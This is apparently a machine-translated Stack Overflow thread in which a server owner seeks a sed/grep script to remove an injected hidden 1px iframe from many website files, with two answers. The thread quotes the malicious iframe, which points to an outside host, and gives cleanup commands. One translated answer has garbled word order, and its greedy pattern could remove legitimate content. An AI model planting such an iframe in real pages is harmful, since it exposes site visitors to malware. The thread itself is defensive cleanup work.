1

我正在寻找一个脚本来从我的 linux 服务器中删除以下 iframe 恶意软件:

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>

它感染了我服务器上不同网站上的数百个文件。我试过了

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

但它只是输出:

    sed: -e expression #1, char 49: unknown option to `s'

感谢你的帮助 :)

干杯迪

4

2 回答 2

1

从 sed 正则表达式中的 url 中取消反斜杠。

于 2013-05-15T08:03:02.933 回答
0

这应该是一个更通用的解决方案。实际上,恶意软件所做的就是在此之前查找</body>并注入它。因此,您可以在 the 之前iframe查找一个which并将其替换为iframe</body></body>

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'

我发现关于重命名恶意软件文件的另一个问题对于.hacked通过在末尾重命名扩展名来快速删除所有受感染的文件也很有用。然后你可以修复黑客并最终删除.hacked

于 2015-05-04T09:39:16.143 回答